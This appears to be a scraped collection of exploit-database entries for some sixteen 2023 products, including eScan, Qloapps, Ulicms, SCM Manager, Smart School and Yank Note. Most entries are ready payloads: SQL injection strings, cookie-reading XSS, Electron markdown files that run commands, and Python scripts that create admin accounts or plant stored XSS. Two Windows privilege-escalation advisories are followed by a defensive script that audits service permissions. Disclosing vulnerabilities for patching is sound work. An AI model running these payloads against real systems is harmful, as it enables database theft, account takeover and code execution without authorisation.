
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

*Steps of Reproduction / Proof of Concept (POC)*

1. Log in to the eScan Management Console with a valid username and
password as the root user.
2. Navigate to the URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that the "UsrId" parameter was
vulnerable to SQL injection. Furthermore, it was also possible to dump
all the databases and inject an OS shell directly into the MS SQL Server
using the SQLMap tool.
            
# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256


Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:
1) Go to Signin page on the system.
2) There are two parameters which can be exploited via XSS
	- back
	- email_create

2.1) Insert your payload in the "back" parameter (GET and POST requests)
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	xss onfocus=alert(1) autofocus= xss

	Payload (URL Encoded): 
	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

	Full GET Request (back): 
	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" parameter (POST requests only)
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 

	Payload (Plain text): 
	xss><img src=a onerror=alert(document.cookie)>xss

	Payload (URL Encoded): 
	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

	POST Request (email_create) (POST REQUEST DATA ONLY): 
	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
            
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703

*Steps of Reproduction / Proof of Concept (POC)*

1. Log in to the eScan Management Console with valid user credentials.
2. Navigate to the URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now inject the Cross Site Scripting payload into the "from" parameter as
shown below, and a valid XSS pop-up appears.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user's session cookie to perform account takeover.
            
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] Exploit:

[path]/admin.php?show=reply&id=[Injected Query]


[#] 3xample:

[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -


[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
            
HireHackking

Smart School v1.0 - SQL Injection

# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1

### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1

Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Date: 2023-04-24
# Exploit Author: 8bitsec
# CVE: CVE-2023-31873
# Vendor Homepage: https://github.com/mariuskueng/gin
# Software Link: https://github.com/mariuskueng/gin
# Version: 0.7.4
# Tested on: [Mac OS 13]

Release Date:
2023-04-24

Product & Service Introduction:
Javascript Markdown editor for Mac

Technical Details & Description:
A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload:

<video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Gin will auto execute the Calculator application.

Stackposts Social Marketing Tool v1.0 - SQL Injection

# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*

### Parameter & Payloads ###

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg

Quicklancer v1.0 - SQL Injection

# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

action=searchStateCountry&dataString=deneme

### Parameter & Payloads ###

Parameter: dataString (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
# Date: 2023-05-24
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.squarepiginteractive.com
# Software Link: https://www.fusioninvoice.com/store
# Version: 2023-1.0
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
# CVE: CVE-2023-25439

Description:
A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows an attacker to execute arbitrary web scripts or HTML. Injecting persistent JavaScript code inside the title and/or description while creating a task/expense/project (and possibly others), it will be triggered once the page gets loaded.

Steps to reproduce:
- Click on "Expenses" or "Tasks" and add (or edit an existing) one,
- Insert a payload PoC inside a field, for example in the "Phone number" (or "Description"),
- Click on 'Save'.

Visiting the website dashboard, as well as the customer or project summary page, the JavaScript code will be executed.

PoC Screenshots: https://imagebin.ca/v/7FOZfztkDs3I

MobileTrans 4.0.11 - Weak Service Privilege Escalation

# Exploit Title: MobileTrans 4.0.11 - Weak Service Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://mobiletrans.wondershare.com/
# Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
# Version: MobileTrans version 4.0.11
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31748

Vulnerability Description:

MobileTrans is the world's No. 1 mobile-to-mobile file transfer application. MobileTrans version 4.0.11 suffered from a weak service permission vulnerability that allows a normal Windows user to elevate to local admin. The service "ElevationService" was installed when MobileTrans version 4.0.11 was installed on the Windows operating system. The service "ElevationService" allows the local user to elevate to local admin, as "ElevationService" runs with SYSTEM privileges. Effectively, the local user is able to elevate to local admin upon successfully modifying the service or replacing the affected executable.

C:\Users\HninKayThayar\Desktop>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe"
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F
                                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                                     BUILTIN\Administrators:(ID)F
                                                                     BUILTIN\Users:(ID)R
                                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

Service Provider Management System v1.0 - SQL Injection

# Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
# Version: 1.0
# Tested on: Windows/Linux

1. Description:

Service Provider Management System v1.0 allows SQL Injection via the ID parameter in /php-spms/?page=services/view&id=2. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit the latest vulnerabilities in the underlying database.

Endpoint: /php-spms/?page=services/view&id=2
Vulnerable parameter: id (GET)

2. Proof of Concept:
----------------------

Step 1 - By visiting the URL http://localhost/php-spms/?page=services/view&id=2, just add a single quote to verify the SQL Injection.

Step 2 - Run sqlmap -u "http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql

SQLMap Response:
----------------------
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
# Exploit Title: Filmora 12 version (Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 (Build 1.0.0.7)
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747

Vulnerability description:

Filmora is a professional video editing software. Wondershare NativePush Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The service "NativePushService" was vulnerable to an unquoted service path vulnerability, which led to full local privilege escalation on the affected Windows operating system, as the service "NativePushService" was running with SYSTEM privileges and the local user has write access to the directory where the service is located. Effectively, the local user is able to elevate to local admin upon successfully replacing the affected executable.

C:\sc qc NativePushService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Native Push Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F
                                                                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                                                                 BUILTIN\Administrators:(ID)F
                                                                                                 HNINKAYTHAYAR\HninKayThayar:(ID)F
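The two Wondershare entries above (MobileTrans: binary writable by Everyone; Filmora: unquoted path under a user profile) can be checked mechanically from the same `sc qc` and `cacls` output they quote. The following is an added example, not code from either advisory: it parses that output and reports the misconfigurations a defender would remediate, using the outputs quoted above (abridged) as its sample input. The TRUSTED principal set is an assumption about which accounts may legitimately hold write rights on a LocalSystem service binary.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumption: only these principals may legitimately hold write rights on a LocalSystem
# service binary; any other principal with write rights is reported.
TRUSTED = {"nt authority\\system", "builtin\\administrators", "nt service\\trustedinstaller", "creator owner"}
WRITE_RIGHTS = {"F", "C", "W"}  # cacls: Full control, Change, Write


@dataclass
class ServiceConfig:
    name: str
    binary_path: str
    start_name: str


def parse_sc_qc(text: str) -> ServiceConfig:
    """Pull SERVICE_NAME, BINARY_PATH_NAME and SERVICE_START_NAME out of `sc qc` output."""
    name, fields = "", {}
    for line in text.splitlines():
        m = re.match(r"^SERVICE_NAME:\s*(\S+)", line)
        if m:
            name = m.group(1)
            continue
        m = re.match(r"^\s+([A-Z_]{3,})\s*:\s*(.*)$", line)  # indented "KEY : value" rows only
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return ServiceConfig(name, fields.get("BINARY_PATH_NAME", ""), fields.get("SERVICE_START_NAME", ""))


def parse_cacls(text: str, binary_path: str) -> List[Tuple[str, str]]:
    """Return (principal, rights) pairs from `cacls <file>`; the first ACE shares its line with the path."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or "cacls " in line.lower():  # blank line or the echoed command
            continue
        if line.lower().startswith(binary_path.lower()):
            line = line[len(binary_path):].strip()
        m = re.match(r"^(.+?):(?:\([A-Z]+\))*([A-Z]+)$", line)  # e.g. Everyone:(ID)F
        if m:
            aces.append((m.group(1), m.group(2)))
    return aces


def unquoted_with_spaces(binary_path: str) -> bool:
    """True when the path is not quoted and contains a space before '.exe'."""
    p = binary_path.strip()
    return not p.startswith('"') and " " in p.lower().split(".exe")[0]


def audit(sc_output: str, cacls_output: str) -> List[str]:
    """Report the weaknesses described in the two advisories for one service."""
    svc = parse_sc_qc(sc_output)
    path, issues = svc.binary_path, []
    if unquoted_with_spaces(path):
        # Exploitable only if a low-privilege user can create files in an intermediate
        # directory (C:\, C:\Program Files, ...); reported regardless, since the path should be quoted.
        issues.append(f"{svc.name}: unquoted service path with spaces: {path}")
    if path.lower().startswith("c:\\users\\"):
        issues.append(f"{svc.name}: binary lives under a user profile, which its owner can overwrite: {path}")
    for principal, rights in parse_cacls(cacls_output, path):
        if principal.lower() not in TRUSTED and set(rights) & WRITE_RIGHTS:
            issues.append(f"{svc.name}: {principal} has '{rights}' on the service binary")
    if issues and svc.start_name.lower() == "localsystem":
        issues.append(f"{svc.name}: runs as LocalSystem, so a replaced binary executes as SYSTEM")
    return issues


# Sample inputs, abridged from the command output quoted in the two advisories above.
MOBILETRANS_SC = r"""
C:\Users\HninKayThayar\Desktop>sc qc ElevationService
SERVICE_NAME: ElevationService
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        SERVICE_START_NAME : LocalSystem
"""
MOBILETRANS_CACLS = r"""
C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe"
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F
                                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                                     BUILTIN\Administrators:(ID)F
                                                                     BUILTIN\Users:(ID)R
"""
FILMORA_SC = r"""
C:\sc qc NativePushService
SERVICE_NAME: NativePushService
        BINARY_PATH_NAME   : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        SERVICE_START_NAME : LocalSystem
"""
FILMORA_CACLS = r"""
C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F
                                    NT AUTHORITY\SYSTEM:(ID)F
                                    BUILTIN\Administrators:(ID)F
                                    HNINKAYTHAYAR\HninKayThayar:(ID)F
"""

if __name__ == "__main__":
    for sc, acl in ((MOBILETRANS_SC, MOBILETRANS_CACLS), (FILMORA_SC, FILMORA_CACLS)):
        print("\n".join(audit(sc, acl)))
```

Note that the MobileTrans path is also reported as unquoted: it is, but under C:\Program Files that finding is not exploitable on its own, which is why the ACL check is the one that matters for that service.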

Ulicms 2023.1 - create admin user via mass assignment

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: create admin user via mass assignment
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

import requests

new_name = input("name: ")
new_email = input("email: ")
new_pass = input("password: ")

url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Request is success and created new admin account")
else:
    print("Request is failure.!!")

#POC video : https://youtu.be/SCkRJzJ0FVk

SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)

#!/usr/bin/python3
# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
# Google Dork: intitle:"SCM Manager" intext:1.60
# Date: 05-25-2023
# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)
# Vendor Homepage: https://scm-manager.org/
# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/
# Version: 1.2 <= 1.60
# Tested on: Debian based
# CVE: CVE-2023-33829

# Modules
import requests
import argparse
import sys

# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", required=True, help="password of the user")
args = parser.parse_args()

# Credentials (read from the parsed arguments rather than fixed sys.argv positions,
# so the options can be given in any order)
user = args.user
password = args.password

# Global Variables
main_url = "http://localhost:8080/scm"  # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"

# Create a session
session = requests.Session()

# Credentials to send
post_data = {
    'username': user,      # change if you have any other user with write permissions
    'password': password   # change if you have any other user with write permissions
}

r = session.post(auth_url, data=post_data)
if r.status_code == 200:
    print("[+] Authentication successfully")
else:
    print("[-] Failed to authenticate")
    sys.exit(1)

new_user = {
    "name": "newUser",
    "displayName": "<img src=x onerror=alert('XSS')>",
    "mail": "",
    "password": "",
    "admin": False,
    "active": True,
    "type": "xml"
}
create_user = session.post(users, json=new_user)
print("[+] User with XSS Payload created")

new_group = {
    "name": "newGroup",
    "description": "<img src=x onerror=alert('XSS')>",
    "type": "xml"
}
create_group = session.post(groups, json=new_group)
print("[+] Group with XSS Payload created")

new_repo = {
    "name": "newRepo",
    "type": "svn",
    "contact": "",
    "description": "<img src=x onerror=alert('XSS')>",
    "public": False
}
create_repo = session.post(repos, json=new_repo)
print("[+] Repository with XSS Payload created")

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted, this will take some time, but it is not a problem for an attacker to decrypt them if they are not strongly enough encrypted.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)

## Time spend:
01:00:00

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date:
2023-04-27

Product & Service Introduction:
A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:
A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload.

Mac:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.

LeadPro CRM v1.0 - SQL Injection

# Exploit Title: LeadPro CRM v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
# Demo Site: https://demo.leadifly.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1
Host: localhost
Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
X-Xsrf-Token: eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
Referer: https://localhost/admin/product
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

### Parameter & Payloads ###

Parameter: filters (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10
